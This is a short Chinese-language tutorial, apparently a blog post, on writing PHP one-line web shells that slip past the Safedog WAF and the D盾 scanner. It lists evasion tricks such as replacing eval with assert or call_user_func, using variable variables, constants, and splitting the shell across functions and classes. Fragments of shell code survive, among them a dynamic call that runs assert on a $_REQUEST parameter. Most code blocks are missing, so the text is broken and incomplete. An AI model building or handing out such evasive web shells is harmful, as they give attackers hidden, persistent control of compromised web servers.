绕过WAF-一句话木马

注:本次的测试环境是最新的安全狗Apache:V4.0
一句话木马:
1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func()
2.使用end()函数来代替,可以写成:

注:密码是随便写,在安全狗上是查不出来的,但是D盾会查出一个最低价的危险,所以,如果要让D盾完全测不出来可以这样写：

3.字符拼接加双美元符

4.常量

5.用函数强行分割

6.用类分割

name");
}
$user=new User;
$user->name=' '.$_REQUEST['a'];
?>

7.多方式传参

 $value)
{if($key == 'assert'){
$key($_REQUEST['a']);
	}
}
?>

8.CTF中看到的一个手法(但是D盾可以发现这个木马)

注:$a['internal'][841]表示的是assert